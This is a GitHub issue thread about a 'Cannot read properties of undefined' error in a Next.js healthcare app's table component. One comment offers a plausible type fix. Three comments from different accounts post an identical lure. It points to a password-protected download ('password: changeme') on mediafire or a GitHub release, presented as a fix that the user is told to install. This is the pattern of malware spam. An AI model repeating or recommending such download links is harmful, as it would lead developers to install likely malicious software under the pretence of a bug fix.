### ISSUE TITLE
Unhandled Runtime Error 

### ISSUE THREAD

**Issue by promumyhero** [adrianhajdin/healthcare#46]
![Capture](https://github.com/user-attachments/assets/8e795e21-c0a3-4ca4-bd4c-2df27083ad71)

<TableBody>
          {table.getRowModel().rows?.length ? (
            table.getRowModel().rows.map((row) => (
              <TableRow
                key={row.id}
                data-state={row.getIsSelected() && "selected"}
              >
                {row.getVisibleCells().map((cell) => (
                  <TableCell key={cell.id}>
                    {flexRender(cell.column.columnDef.cell, cell.getContext())}
                  </TableCell>
                ))}
              </TableRow>
            ))
          ) : (
            <TableRow>
              <TableCell colSpan={columns.length} className="h-24 text-center">
                No results.
              </TableCell>
            </TableRow>
          )}
        </TableBody>

got this eror (TypeError: Cannot read properties of undefined (reading 'length')) dont know how to solve this

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Ak6876** [comment]
![image](https://github.com/user-attachments/assets/f905b53c-0465-4664-b136-c1a1396f8c5d)


According to your latest github repo, I found that the issue is with the "type Payment". Remove it and replace the Payment in "ColumnDef <<Payment>>"  with "Appointment". Make sure to export Appointment. I hope this resolves your issue.

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by promumyhero** [comment]
thanksss

**Comment by AbhinavSharma486** [comment]
i have also same issue after change "ColumnDef <>" with "Appointment"
